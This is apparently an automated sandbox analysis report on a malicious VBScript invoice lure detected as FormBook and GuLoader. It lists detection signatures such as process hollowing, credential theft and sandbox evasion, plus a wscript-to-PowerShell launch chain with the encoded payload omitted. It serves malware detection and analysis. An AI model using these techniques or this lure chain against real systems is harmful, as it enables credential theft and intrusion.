Windows
Analysis Report
Unclear Proforma Invoice.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Connects to several IPs in different countries
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
- wscript.exe (PID: 8084 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
- powershell.exe (PID: 1740 cmdline:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64-encoded command omitted]"